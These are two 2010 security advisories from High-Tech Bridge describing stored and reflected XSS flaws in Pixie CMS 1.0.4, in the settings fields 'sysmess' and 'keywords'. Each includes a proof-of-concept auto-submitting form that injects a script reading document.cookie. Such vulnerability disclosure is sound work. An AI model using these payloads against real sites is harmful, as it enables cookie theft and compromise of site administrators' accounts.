Stored XSS vulnerability in Pixie
Vulnerability ID: HTB22469 Reference: http://www.htbridge.ch/advisory/stored_xss_vulnerability_in_pixie.html Product: Pixie Vendor: Toggle Labs Ltd ( http://www.getpixie.co.uk/ ) Vulnerable Version: 1.0.4 and Probably Prior Versions Vendor Notification: 01 July 2010 Vulnerability Type: Stored XSS (Cross Site Scripting) Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response Risk level: Medium Credit: High-Tech Bridge SA - Ethical Hacking Penetration Testing (http://www.htbridge.ch/) Vulnerability Details: User can execute arbitrary JavaScript code within the vulnerable application. The vulnerability exists due to failure in the Pixie core settings saving script to properly sanitize user-supplied input in sysmess variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data. An attacker can use browser to exploit this vulnerability. The following PoC is available: form accept-charset=UTF-8 action=http://host/admin/index.php?s=settingsx=pixie; method=post name=main input type=hidden name=langu value=en-gb / input type=hidden name=time_zone value=+0 / input type=hidden name=dstime value=no / input type=hidden name=dateformat value=%Oe %B %Y, %H:%M / input type=hidden name=rte value=1 / input type=hidden name=logs value=5 / input type=hidden name=sysmess value='hello messagescriptalert(document.cookie)/script' / input type=submit name=settings_edit id=form_addedit_submit value=Update / /form script document.getElementById('form_addedit_submit').click(); /script
XSS vulnerability in Pixie
Vulnerability ID: HTB22468 Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_pixie.html Product: Pixie Vendor: Toggle Labs Ltd ( http://www.getpixie.co.uk/ ) Vulnerable Version: 1.0.4 and Probably Prior Versions Vendor Notification: 01 July 2010 Vulnerability Type: XSS (Cross Site Scripting) Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response Risk level: Medium Credit: High-Tech Bridge SA - Ethical Hacking Penetration Testing (http://www.htbridge.ch/) Vulnerability Details: User can execute arbitrary JavaScript code within the vulnerable application. The vulnerability exists due to failure in the site settings saving script to properly sanitize user-supplied input in keywords variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data. An attacker can use browser to exploit this vulnerability. The following PoC is available: form accept-charset=UTF-8 action=http://host/admin/index.php?s=settingsx=site; method=post name=main input type=hidden name=sitename value=Pixie / input type=hidden name=url value=http://host/; / input type=hidden name=default value=blog/ / input type=hidden name=keywords value='key1scriptalert(document.cookie)/script' / input type=hidden name=site_auth value=sute author / input type=hidden name=site_cright value=copyright / input type=hidden name=cleanurls value=yes / input type=submit name=settings_edit id=form_addedit_submit value=Update / /form script document.getElementById('form_addedit_submit').click(); /script